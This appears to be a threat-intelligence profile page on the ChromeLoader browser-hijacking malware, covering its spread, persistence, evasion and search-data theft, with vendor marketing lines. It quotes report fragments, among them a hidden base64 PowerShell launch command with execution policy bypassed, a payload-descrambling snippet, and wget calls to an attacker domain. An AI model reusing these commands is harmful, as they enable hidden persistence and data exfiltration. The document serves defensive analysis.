ChromeLoader, also known as Choziosi Loader and ChromeBack, is a multistage browser-hijacking and adware family active since at least December 2021. It targets Windows and macOS, installing malicious browser extensions that alter browser settings, intercept searches, redirect traffic through attacker-controlled infrastructure, and generate advertising revenue. Its extensions also exfiltrate search queries and associated browsing data to command-and-control servers. Windows variants primarily target Chromium-based browsers, while macOS variants have targeted Google Chrome and Safari.
Distribution commonly uses malvertising, SEO poisoning, and download lures advertising cracked software, games, cheats, pirated media, or freeware. Infection chains have used ISO and VHD images on Windows and DMG images on macOS. Windows delivery has also evolved to include scripts, executable installers, MSI packages, and obfuscated Node.js/NW.js applications. ChromeLoader has been distributed by Charcoal Stork, a separately tracked distribution cluster that also delivers other malware families.
Windows variants use PowerShell and staged executable or script components to download and load malicious extensions, with persistence established through scheduled tasks, startup shortcuts, or registry autorun entries. macOS variants use shell scripts and LaunchAgents. ChromeLoader obstructs removal by redirecting users away from extension-management pages, repeatedly restoring its extension, and disabling or removing other extensions in some versions. Encoded commands, heavily obfuscated JavaScript, dynamically constructed command-and-control URLs, and temporary-artifact cleanup hinder detection and analysis. Its search-data collection exposes potentially sensitive information from both consumer and enterprise browsing activity.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
ChromeLoader is a browser hijacker capable of redirecting searches for popular search engines such as Google, Bing and Yahoo, sending search data to its C2, and adding and preventing users from uninstalling a malicious browser extension.
34 distinct techniques documented for this family, organized by ATT&CK tactic.
The PowerShell process executed WMI queries, used for installing a new scheduled task named chrome *
ChromeLoader uses a Windows API Microsoft.Win32.TaskScheduler to create a Scheduled task... The scheduled task contains the following command which executes a PowerShell command with a base64 payload.
The scheduled task contains the following command which executes a PowerShell command with a base64 payload. cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E <base64EncodedPayload>
The persistence is configured to execute a PowerShell command that runs a base64 encoded payload... cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E <base64EncodedPayload>
The malware launched a cmd.exe process, which in turn executed powershell.exe.
In this case, the dropper is a disk image (DMG) file ... containing several files, including one bash script.
ChromeLoader uses a Windows API Microsoft.Win32.TaskScheduler to create a Scheduled task... The scheduled task contains the following command which executes a PowerShell command with a base64 payload.
ChromeLoader creates one of the following registry keys for Scheduled task Location 2: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\TREE\ChromeLoader
Once the extension is saved, it extracts the data and installs it into Chrome.
A descramble function exists to reconstructs base64 payload... Obfuscated Javascript background.js (truncated)
Before creating the folder, the malware verifies if one of the following paths already exists: %AppData%\Local\chrome_metric ... chrome_history ... chrome_glass ... chrome_nav
A descramble function exists to reconstructs base64 payload... foreach ( char c in File . ReadAllText ( "_meta.txt" ) ) { if ( replaceDict . ContainsKey ( c ) ) { res += replaceDict [ c ]
It also intercepts keyboard keys to account for the users that use the keyboard to navigate the results.
It also intercepts keyboard keys to account for the users that use the keyboard to navigate the results.
wget " https:// $domain /archive.zip " ... wget " https:// $domain /un?did= $dd &ver= $ver "
The Chrome Extension periodically makes web requests every 30 minutes to generate Ads. Analytics is sent to the attackers domain every 3 hours.
314 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware campaign referenced as delivering malicious browser extensions via VHD files and maintaining persistence by reinstalling the extension after reboot using Windows Task Scheduler.
Malware that abuses Chromium browser launch parameters by modifying Chrome shortcuts/LNK files to load malicious browser extensions, enabling sideloading and persistence inside the browser process.
Named malware family referenced in the context of Sigma detection for malicious Chrome extension loading and browser-focused compromise activity.
ChromeLoader is described as a malware campaign delivered via disguised cracked software downloads that installs a Chrome extension to hijack search results and redirect users through attacker-controlled pages.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.